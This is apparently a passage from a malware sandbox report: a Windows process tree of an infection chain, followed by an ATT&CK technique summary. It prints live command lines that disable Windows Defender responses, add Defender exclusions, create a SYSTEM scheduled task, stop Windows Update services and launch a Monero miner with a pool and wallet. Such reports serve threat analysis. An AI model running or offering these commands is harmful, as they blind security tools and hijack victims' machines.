                                                        PID:5488
                                                    • C:\Users\Admin\Pictures\VRJLauzPQipxwGSSGj4zS8Ii.exe
                                                      "C:\Users\Admin\Pictures\VRJLauzPQipxwGSSGj4zS8Ii.exe" /s
                                                      8⤵
                                                      • Executes dropped EXE
                                                      PID:5392
                                                    • C:\Users\Admin\Pictures\IZu2MThxcI91nkTyNVPKiKSr.exe
                                                      "C:\Users\Admin\Pictures\IZu2MThxcI91nkTyNVPKiKSr.exe"
                                                      8⤵
                                                      • Executes dropped EXE
                                                      PID:6112
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -nologo -noprofile
                                                        9⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        PID:2008
                                                    • C:\Users\Admin\Pictures\BimcM0uKItKu1au5o0ux6Jsv.exe
                                                      "C:\Users\Admin\Pictures\BimcM0uKItKu1au5o0ux6Jsv.exe"
                                                      8⤵
                                                      • Executes dropped EXE
                                                      PID:5676
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -nologo -noprofile
                                                        9⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        PID:1700
                                                    • C:\Users\Admin\Pictures\ob7R4xeFvWdlVcLsti8npzDU.exe
                                                      "C:\Users\Admin\Pictures\ob7R4xeFvWdlVcLsti8npzDU.exe"
                                                      8⤵
                                                        PID:744
                                                      • C:\Users\Admin\Pictures\k6QXPLTy54v3Vw2lZhyhvd5y.exe
                                                        "C:\Users\Admin\Pictures\k6QXPLTy54v3Vw2lZhyhvd5y.exe"
                                                        8⤵
                                                          PID:5048
                                                          • C:\Users\Admin\AppData\Local\Temp\7zSB215.tmp\Install.exe
                                                            .\Install.exe /tEdidDDf "385118" /S
                                                            9⤵
                                                              PID:760
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                10⤵
                                                                  PID:2072
                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                    11⤵
                                                                      PID:4940
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                        12⤵
                                                                          PID:2936
                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                            13⤵
                                                                              PID:5412
                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                          11⤵
                                                                            PID:5336
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                              12⤵
                                                                                PID:5220
                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                  13⤵
                                                                                    PID:5876
                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                11⤵
                                                                                  PID:5964
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                    12⤵
                                                                                      PID:3008
                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                        13⤵
                                                                                          PID:812
                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                      11⤵
                                                                                        PID:6068
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                          12⤵
                                                                                            PID:3228
                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                              13⤵
                                                                                                PID:952
                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                            11⤵
                                                                                              PID:2976
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                12⤵
                                                                                                  PID:6132
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                    13⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    PID:2840
                                                                                                    • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                      14⤵
                                                                                                        PID:1584
                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                10⤵
                                                                                                  PID:5368
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                    11⤵
                                                                                                      PID:2308
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                        12⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        PID:3300
                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                          13⤵
                                                                                                            PID:5280
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 02:22:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSB215.tmp\Install.exe\" it /nJPdiddvzz 385118 /S" /V1 /F
                                                                                                      10⤵
                                                                                                      • Creates scheduled task(s)
                                                                                                      PID:2320
                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                                                                      10⤵
                                                                                                        PID:4056
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                          11⤵
                                                                                                            PID:2428
                                                                                                            • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                              12⤵
                                                                                                                PID:3008
                                                                                                      • C:\Users\Admin\Pictures\7nON3tBLEYnR5KBlguAFcetW.exe
                                                                                                        "C:\Users\Admin\Pictures\7nON3tBLEYnR5KBlguAFcetW.exe"
                                                                                                        8⤵
                                                                                                          PID:1868
                                                                                                          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                            9⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            PID:3400
                                                                                                        • C:\Users\Admin\Pictures\guqicpEAo6oMpPDkUGn5Edfl.exe
                                                                                                          "C:\Users\Admin\Pictures\guqicpEAo6oMpPDkUGn5Edfl.exe"
                                                                                                          8⤵
                                                                                                            PID:1548
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSE5C7.tmp\Install.exe
                                                                                                              .\Install.exe /tEdidDDf "385118" /S
                                                                                                              9⤵
                                                                                                                PID:3540
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                  10⤵
                                                                                                                    PID:5968
                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                      11⤵
                                                                                                                        PID:3548
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                          12⤵
                                                                                                                            PID:2724
                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                              13⤵
                                                                                                                                PID:2600
                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                            11⤵
                                                                                                                              PID:5188
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                12⤵
                                                                                                                                  PID:4436
                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                                                                                                                        7⤵
                                                                                                                          PID:5592
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe"
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:4536
                                                                                                                • C:\Users\Admin\1000006002\a18433a704.exe
                                                                                                                  "C:\Users\Admin\1000006002\a18433a704.exe"
                                                                                                                  3⤵
                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                  • Checks BIOS information in registry
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Checks whether UAC is enabled
                                                                                                                  PID:3820
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1000012001\installer.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1000012001\installer.exe"
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:3740
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                              1⤵
                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks whether UAC is enabled
                                                                                                              PID:2192
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                              1⤵
                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Executes dropped EXE
                                                                                                              • Identifies Wine through registry keys
                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:3372
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1836 -ip 1836
                                                                                                              1⤵
                                                                                                                PID:4244
                                                                                                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:996
                                                                                                                • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                                                                                  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:2192
                                                                                                                  • C:\Windows\Temp\879814.exe
                                                                                                                    "C:\Windows\Temp\879814.exe" --list-devices
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    PID:4312
                                                                                                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:1568
                                                                                                                • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                                                                                                  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:3156
                                                                                                              • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:3312
                                                                                                                • C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
                                                                                                                  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:3000
                                                                                                                  • C:\Windows\Temp\652956.exe
                                                                                                                    "C:\Windows\Temp\652956.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                    PID:3780
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4724 -ip 4724
                                                                                                                1⤵
                                                                                                                  PID:3940
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 4724 -ip 4724
                                                                                                                  1⤵
                                                                                                                    PID:972
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4724 -ip 4724
                                                                                                                    1⤵
                                                                                                                      PID:4776
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4964 -ip 4964
                                                                                                                      1⤵
                                                                                                                        PID:1640
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4724 -ip 4724
                                                                                                                        1⤵
                                                                                                                          PID:792
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4724 -ip 4724
                                                                                                                          1⤵
                                                                                                                            PID:240
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                                            1⤵
                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                            • Checks BIOS information in registry
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Checks whether UAC is enabled
                                                                                                                            PID:5260
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:5384
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                            1⤵
                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                            • Checks BIOS information in registry
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Identifies Wine through registry keys
                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:3944
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4724 -ip 4724
                                                                                                                            1⤵
                                                                                                                              PID:5500
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4724 -ip 4724
                                                                                                                              1⤵
                                                                                                                                PID:5464
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4724 -ip 4724
                                                                                                                                1⤵
                                                                                                                                  PID:5460
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4724 -ip 4724
                                                                                                                                  1⤵
                                                                                                                                    PID:5620
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4724 -ip 4724
                                                                                                                                    1⤵
                                                                                                                                      PID:4208
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                      1⤵
                                                                                                                                        PID:6100
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                        1⤵
                                                                                                                                          PID:1876
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4724 -ip 4724
                                                                                                                                          1⤵
                                                                                                                                            PID:5084
                                                                                                                                          • C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                                                            C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                                                            1⤵
                                                                                                                                              PID:4576
                                                                                                                                              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                2⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                PID:5612
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                2⤵
                                                                                                                                                  PID:5420
                                                                                                                                                  • C:\Windows\system32\wusa.exe
                                                                                                                                                    wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                    3⤵
                                                                                                                                                      PID:2676
                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                    C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                    2⤵
                                                                                                                                                    • Launches sc.exe
                                                                                                                                                    PID:5280
                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                    C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                    2⤵
                                                                                                                                                    • Launches sc.exe
                                                                                                                                                    PID:5416
                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                    C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                    2⤵
                                                                                                                                                    • Launches sc.exe
                                                                                                                                                    PID:2816
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 856 -ip 856
                                                                                                                                                  1⤵
                                                                                                                                                    PID:5084
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 856 -ip 856
                                                                                                                                                    1⤵
                                                                                                                                                      PID:2276
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 856 -ip 856
                                                                                                                                                      1⤵
                                                                                                                                                        PID:3876
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 856 -ip 856
                                                                                                                                                        1⤵
                                                                                                                                                          PID:5992
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSB215.tmp\Install.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7zSB215.tmp\Install.exe it /nJPdiddvzz 385118 /S
                                                                                                                                                          1⤵
                                                                                                                                                            PID:4120
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                              2⤵
                                                                                                                                                                PID:1464
                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:5052
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:5992
                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:5696
                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:2840
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:6032
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 856 -ip 856
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:1648
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 856 -ip 856
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:412
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 856 -ip 856
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:1964
                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 856 -ip 856
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:5324
                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 856 -ip 856
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:3960

                                                                                                                                                                                Network

                                                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                                Execution

                                                                                                                                                                                Command and Scripting Interpreter

                                                                                                                                                                                1
                                                                                                                                                                                T1059

                                                                                                                                                                                PowerShell

                                                                                                                                                                                1
                                                                                                                                                                                T1059.001

                                                                                                                                                                                System Services

                                                                                                                                                                                2
                                                                                                                                                                                T1569

                                                                                                                                                                                Service Execution

                                                                                                                                                                                2
                                                                                                                                                                                T1569.002

                                                                                                                                                                                Scheduled Task/Job

                                                                                                                                                                                1
                                                                                                                                                                                T1053

                                                                                                                                                                                Persistence

                                                                                                                                                                                Create or Modify System Process

                                                                                                                                                                                2
                                                                                                                                                                                T1543

                                                                                                                                                                                Windows Service

                                                                                                                                                                                2
                                                                                                                                                                                T1543.003

